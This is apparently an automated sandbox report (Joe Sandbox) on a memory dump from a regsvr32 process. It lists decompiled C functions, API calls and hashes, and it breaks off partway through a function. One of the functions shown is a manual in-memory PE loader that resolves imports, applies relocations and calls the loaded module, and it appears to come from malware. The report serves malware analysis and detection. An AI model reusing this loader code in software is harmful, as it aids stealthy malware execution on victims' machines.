                                                                                                                                                                        0x0536de92
                                                                                                                                                                        0x0536dea6
                                                                                                                                                                        0x0536dea6
                                                                                                                                                                        0x0536dea9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536de94
                                                                                                                                                                        0x0536de94
                                                                                                                                                                        0x0536de99
                                                                                                                                                                        0x0536de9d
                                                                                                                                                                        0x0536de9d
                                                                                                                                                                        0x0536dea1
                                                                                                                                                                        0x0536dea2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536de94
                                                                                                                                                                        0x0536deaa
                                                                                                                                                                        0x0536deaa
                                                                                                                                                                        0x0536dead
                                                                                                                                                                        0x0536deae
                                                                                                                                                                        0x0536deb5
                                                                                                                                                                        0x0536debf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536dec1
                                                                                                                                                                        0x0536dec7
                                                                                                                                                                        0x0536decb
                                                                                                                                                                        0x0536df24
                                                                                                                                                                        0x0536ded4
                                                                                                                                                                        0x0536dee1
                                                                                                                                                                        0x0536dee7
                                                                                                                                                                        0x0536dee9
                                                                                                                                                                        0x0536def0
                                                                                                                                                                        0x0536def6
                                                                                                                                                                        0x0536defe
                                                                                                                                                                        0x0536df06
                                                                                                                                                                        0x0536df12
                                                                                                                                                                        0x0536df18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536df2a
                                                                                                                                                                        0x0536deb7
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 0536DE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0536DE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 0536DE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0536DEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0536DF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 0536DF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 9307ec394432b8c1ba0717a509ce64586df9692f6cda24037da27c4408388773
                                                                                                                                                                        • Instruction ID: f83f149add4643ab1a77be8bdfb31a20d7884d57d696a9189381e5ca56e8dc7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9307ec394432b8c1ba0717a509ce64586df9692f6cda24037da27c4408388773
                                                                                                                                                                        • Instruction Fuzzy Hash: 8631D271E1411AEACB34AB98C888FADBBB9FF15310F14895DF406E7158DBB09980CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536E656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536E66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0536E672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536E686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536E701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536E704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536E709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        • Opcode ID: 5e31f53577aae7c95c8fbc3248d45b3b4418236810402299d24b83b98d35d671
                                                                                                                                                                        • Instruction ID: 55ee6286886b8bec9d73e7d0610f603ed1904288bd22e7d64ad6d0851c2f02e9
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e31f53577aae7c95c8fbc3248d45b3b4418236810402299d24b83b98d35d671
                                                                                                                                                                        • Instruction Fuzzy Hash: A921FD75D00218BFDB10DFA9CC88DAFBBBDFF48254B108499F505AB250DA71AE05DB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05373D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E05373D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                        0x05373d6f
                                                                                                                                                                        0x05373d7c
                                                                                                                                                                        0x05373d82
                                                                                                                                                                        0x05373d8b
                                                                                                                                                                        0x05373d8e
                                                                                                                                                                        0x05373d91
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373e82
                                                                                                                                                                        0x05373e86
                                                                                                                                                                        0x05373e88
                                                                                                                                                                        0x05373e96
                                                                                                                                                                        0x05373fb4
                                                                                                                                                                        0x05373fb8
                                                                                                                                                                        0x0537407d
                                                                                                                                                                        0x05374086
                                                                                                                                                                        0x05374089
                                                                                                                                                                        0x0537408d
                                                                                                                                                                        0x05374093
                                                                                                                                                                        0x0537409b
                                                                                                                                                                        0x0537409b
                                                                                                                                                                        0x053740a3
                                                                                                                                                                        0x053740b1
                                                                                                                                                                        0x053740b4
                                                                                                                                                                        0x053740b8
                                                                                                                                                                        0x053740be
                                                                                                                                                                        0x053740ce
                                                                                                                                                                        0x053740f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053740fb
                                                                                                                                                                        0x053740d4
                                                                                                                                                                        0x053740e5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053740f3
                                                                                                                                                                        0x053740f7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053740f3
                                                                                                                                                                        0x053740e7
                                                                                                                                                                        0x053740eb
                                                                                                                                                                        0x053740f0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053740f0
                                                                                                                                                                        0x053740d6
                                                                                                                                                                        0x053740da
                                                                                                                                                                        0x053740dc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053740dc
                                                                                                                                                                        0x053740c0
                                                                                                                                                                        0x053740c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053740c6
                                                                                                                                                                        0x05373fbe
                                                                                                                                                                        0x05373fc2
                                                                                                                                                                        0x05373fc4
                                                                                                                                                                        0x05373fd2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373fd8
                                                                                                                                                                        0x05373fe1
                                                                                                                                                                        0x05373fef
                                                                                                                                                                        0x05373ffb
                                                                                                                                                                        0x05374007
                                                                                                                                                                        0x05374010
                                                                                                                                                                        0x05374013
                                                                                                                                                                        0x05374017
                                                                                                                                                                        0x05374019
                                                                                                                                                                        0x05374026
                                                                                                                                                                        0x0537403a
                                                                                                                                                                        0x05374049
                                                                                                                                                                        0x0537405a
                                                                                                                                                                        0x05374023
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374023
                                                                                                                                                                        0x0537405c
                                                                                                                                                                        0x05374060
                                                                                                                                                                        0x05374065
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374065
                                                                                                                                                                        0x05374070
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374072
                                                                                                                                                                        0x05374076
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374078
                                                                                                                                                                        0x05373e9c
                                                                                                                                                                        0x05373ea5
                                                                                                                                                                        0x05373eb3
                                                                                                                                                                        0x05373eb6
                                                                                                                                                                        0x05373ed3
                                                                                                                                                                        0x05373eda
                                                                                                                                                                        0x05373eec
                                                                                                                                                                        0x05373eec
                                                                                                                                                                        0x05373ef3
                                                                                                                                                                        0x05373f03
                                                                                                                                                                        0x05373f1b
                                                                                                                                                                        0x05373f05
                                                                                                                                                                        0x05373f0d
                                                                                                                                                                        0x05373f0d
                                                                                                                                                                        0x05373f1e
                                                                                                                                                                        0x05373f22
                                                                                                                                                                        0x05373f32
                                                                                                                                                                        0x05373f55
                                                                                                                                                                        0x05373f67
                                                                                                                                                                        0x05373f34
                                                                                                                                                                        0x05373f48
                                                                                                                                                                        0x05373f48
                                                                                                                                                                        0x05373f71
                                                                                                                                                                        0x05373f8d
                                                                                                                                                                        0x05373f73
                                                                                                                                                                        0x05373f82
                                                                                                                                                                        0x05373f82
                                                                                                                                                                        0x05373f95
                                                                                                                                                                        0x05373f9e
                                                                                                                                                                        0x05373f9e
                                                                                                                                                                        0x05373fac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373ef5
                                                                                                                                                                        0x05373ef7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373ef7
                                                                                                                                                                        0x05373ef3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373eb6
                                                                                                                                                                        0x05373d99
                                                                                                                                                                        0x05373da7
                                                                                                                                                                        0x05373dac
                                                                                                                                                                        0x05373db7
                                                                                                                                                                        0x05373dba
                                                                                                                                                                        0x05373dbe
                                                                                                                                                                        0x05373dc0
                                                                                                                                                                        0x05373dd0
                                                                                                                                                                        0x05373dd9
                                                                                                                                                                        0x05373de2
                                                                                                                                                                        0x05373dea
                                                                                                                                                                        0x05373df3
                                                                                                                                                                        0x05373dfe
                                                                                                                                                                        0x05373e04
                                                                                                                                                                        0x05373e07
                                                                                                                                                                        0x05373e0a
                                                                                                                                                                        0x05373e11
                                                                                                                                                                        0x05373e18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373e23
                                                                                                                                                                        0x05373e31
                                                                                                                                                                        0x05373e3c
                                                                                                                                                                        0x05373e46
                                                                                                                                                                        0x05373e5e
                                                                                                                                                                        0x05373e6b
                                                                                                                                                                        0x05373e6b
                                                                                                                                                                        0x05373e48
                                                                                                                                                                        0x05373e53
                                                                                                                                                                        0x05373e53
                                                                                                                                                                        0x05373e72
                                                                                                                                                                        0x05373e72
                                                                                                                                                                        0x05373e7a
                                                                                                                                                                        0x05373e7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 05373ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 05373EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05373F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05373F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 05374052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 0a62ef6bc70dac1ca1c843e113c172e25b978530a6e991ba6b239f9ccecd6feb
                                                                                                                                                                        • Instruction ID: dfa52ef99f024772f3da409b918fc223a385c4a83dad09275d661cb06c8de55a
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a62ef6bc70dac1ca1c843e113c172e25b978530a6e991ba6b239f9ccecd6feb
                                                                                                                                                                        • Instruction Fuzzy Hash: BEE1BE75E0420DDFCF24CFA8C980AADBBB5FF08354F148569E816AB691D778A941CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053719A9 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-2132903582
                                                                                                                                                                        • Opcode ID: f237bf9add98f938ac061c266e0ffe872478916ecd617426cd8895152788d944
                                                                                                                                                                        • Instruction ID: 5d1783628ab0cf1d384139a7a579d98b70a723e0f1b625c7a82eb0858e2227d0
                                                                                                                                                                        • Opcode Fuzzy Hash: f237bf9add98f938ac061c266e0ffe872478916ecd617426cd8895152788d944
                                                                                                                                                                        • Instruction Fuzzy Hash: 94411737E1430DA7DB388E689D9DBBE7A6EEF81210F140125FD07E6640E3ADC960C691
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536E400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E0536E400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x537c868, 0, 1, 0x537c878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E05368BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                        0x0536e40d
                                                                                                                                                                        0x0536e410
                                                                                                                                                                        0x0536e413
                                                                                                                                                                        0x0536e424
                                                                                                                                                                        0x0536e42a
                                                                                                                                                                        0x0536e43b
                                                                                                                                                                        0x0536e443
                                                                                                                                                                        0x0536e494
                                                                                                                                                                        0x0536e494
                                                                                                                                                                        0x0536e499
                                                                                                                                                                        0x0536e49e
                                                                                                                                                                        0x0536e49e
                                                                                                                                                                        0x0536e4a1
                                                                                                                                                                        0x0536e4a6
                                                                                                                                                                        0x0536e4ab
                                                                                                                                                                        0x0536e4ab
                                                                                                                                                                        0x0536e4ae
                                                                                                                                                                        0x0536e445
                                                                                                                                                                        0x0536e446
                                                                                                                                                                        0x0536e44c
                                                                                                                                                                        0x0536e45d
                                                                                                                                                                        0x0536e462
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536e464
                                                                                                                                                                        0x0536e471
                                                                                                                                                                        0x0536e479
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536e47b
                                                                                                                                                                        0x0536e47d
                                                                                                                                                                        0x0536e485
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536e487
                                                                                                                                                                        0x0536e48a
                                                                                                                                                                        0x0536e490
                                                                                                                                                                        0x0536e490
                                                                                                                                                                        0x0536e485
                                                                                                                                                                        0x0536e479
                                                                                                                                                                        0x0536e462
                                                                                                                                                                        0x0536e4b3

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E424
                                                                                                                                                                        • CoCreateInstance.OLE32(0537C868,00000000,00000001,0537C878,?,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536E446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E471
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: 0319c427ca39165f4390bd7759e23ec74cfe3beaae9e813ab894f726c3be2234
                                                                                                                                                                        • Instruction ID: 7676f7e30873d9a5aae97a6fa6bcf3ad66fa6b9a59de1304eb1bc2d073812702
                                                                                                                                                                        • Opcode Fuzzy Hash: 0319c427ca39165f4390bd7759e23ec74cfe3beaae9e813ab894f726c3be2234
                                                                                                                                                                        • Instruction Fuzzy Hash: E9217C34A14248BBDB358B66CC4DE5BBFBCEFC2B15F00815CB501AA294CAB09A00D630
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05373379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E05373379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L053734D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E05373352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E05368CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x5371b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                        0x05373379
                                                                                                                                                                        0x0537337c
                                                                                                                                                                        0x05373381
                                                                                                                                                                        0x05373385
                                                                                                                                                                        0x05373385
                                                                                                                                                                        0x0537338b
                                                                                                                                                                        0x0537338f
                                                                                                                                                                        0x05373390
                                                                                                                                                                        0x05373393
                                                                                                                                                                        0x05373394
                                                                                                                                                                        0x05373399
                                                                                                                                                                        0x0537339c
                                                                                                                                                                        0x0537339d
                                                                                                                                                                        0x053733a2
                                                                                                                                                                        0x053733a9
                                                                                                                                                                        0x05373432
                                                                                                                                                                        0x05373432
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053733b4
                                                                                                                                                                        0x053733b5
                                                                                                                                                                        0x053733c7
                                                                                                                                                                        0x053733ed
                                                                                                                                                                        0x053733ed
                                                                                                                                                                        0x053733f6
                                                                                                                                                                        0x053733f8
                                                                                                                                                                        0x053733fe
                                                                                                                                                                        0x0537342d
                                                                                                                                                                        0x0537342d
                                                                                                                                                                        0x05373435
                                                                                                                                                                        0x05373438
                                                                                                                                                                        0x05373438
                                                                                                                                                                        0x05373400
                                                                                                                                                                        0x05373401
                                                                                                                                                                        0x05373407
                                                                                                                                                                        0x05373409
                                                                                                                                                                        0x05373409
                                                                                                                                                                        0x0537340e
                                                                                                                                                                        0x0537340d
                                                                                                                                                                        0x0537340d
                                                                                                                                                                        0x05373415
                                                                                                                                                                        0x05373421
                                                                                                                                                                        0x0537342b
                                                                                                                                                                        0x0537342b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053733d7
                                                                                                                                                                        0x053733d7
                                                                                                                                                                        0x053733d7
                                                                                                                                                                        0x053733dd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053733df
                                                                                                                                                                        0x053733e5
                                                                                                                                                                        0x053733ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053733ea
                                                                                                                                                                        0x053733c7

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        • API String ID: 3619936089-952554281
                                                                                                                                                                        • Opcode ID: 64f1a197a506080f39180d940d7d99c492d90550dfd9b6e95d9fdab2321a716e
                                                                                                                                                                        • Instruction ID: 31986b6789d0caa8265acbc04b4aefa54b21b384ed8d1000793d13e16ca55a2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 64f1a197a506080f39180d940d7d99c492d90550dfd9b6e95d9fdab2321a716e
                                                                                                                                                                        • Instruction Fuzzy Hash: A1218B73F4860C36EB365A68DC85FEE3B8CFF05260F584814F84096140EBA8D9606391
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536377F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E0536377F(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
